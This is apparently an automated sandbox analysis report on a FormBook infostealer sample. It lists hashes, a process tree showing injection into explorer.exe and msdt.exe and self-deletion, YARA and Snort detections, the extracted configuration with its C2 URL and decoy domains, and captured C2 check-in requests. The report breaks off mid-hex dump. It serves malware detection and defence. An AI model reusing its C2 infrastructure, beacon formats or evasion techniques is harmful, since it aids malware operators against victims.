Loading ...

Play interactive tourEdit tour

Windows Analysis Report divpCHa0h7.exe

Overview

General Information

Sample Name:divpCHa0h7.exe
Analysis ID:502315
MD5:fda0d823b262ac2b1bd76a2053c29692
SHA1:73f72d7c987d44d1f236c138c5617b527c5ba340
SHA256:91a166f9a29ad832c9640078210a47e5afa928ab1a79a7b40d3b358e9c8bc5d5
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • divpCHa0h7.exe (PID: 3240 cmdline: 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 5712 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 4132 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 2256 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • msdt.exe (PID: 6440 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
        • cmd.exe (PID: 6732 cmdline: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.divpCHa0h7.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.divpCHa0h7.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.divpCHa0h7.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        1.2.divpCHa0h7.exe.3c268a0.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.divpCHa0h7.exe.3c268a0.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0xcd2c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xcd662:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xf50e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xf5482:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xd9375:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x101195:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0xd8e61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x100c81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0xd9477:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x101297:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0xd95ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x10140f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xce07a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xf5e9a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xd80dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xffefc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xcedf2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xf6c12:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xde867:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x106687:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0xdf90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 14 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Users\user\Desktop\divpCHa0h7.exe, ParentImage: C:\Users\user\Desktop\divpCHa0h7.exe, ParentProcessId: 2256, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6440

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: divpCHa0h7.exeVirustotal: Detection: 16%Perma Link
          Source: divpCHa0h7.exeReversingLabs: Detection: 17%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY
          Source: 5.2.divpCHa0h7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.1.divpCHa0h7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: divpCHa0h7.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: divpCHa0h7.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: divpCHa0h7.exe, 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, msdt.exe, 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: divpCHa0h7.exe, msdt.exe
          Source: Binary string: msdt.pdb source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 4x nop then pop ebx5_2_00406AB9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx15_2_02766AB9

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.161 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mambacustomboats.com
          Source: C:\Windows\explorer.exeDomain query: www.sanlifalan.com
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.165.34.6 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ribbonofficial.com
          Source: C:\Windows\explorer.exeDomain query: www.floaterslaser.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.esyscoloradosprings.com/fqiq/
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1Host: www.ribbonofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.sanlifalan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1Host: www.floaterslaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.mambacustomboats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Oct 2021 17:47:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 59389116584X-Dc: gcp-europe-west1X-Request-ID: cecbddb8-e852-4c90-927e-af3e5555f963X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 69da64d2c8f74303-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 17:47:45 GMTServer: Apache/2.4.51 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 884Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 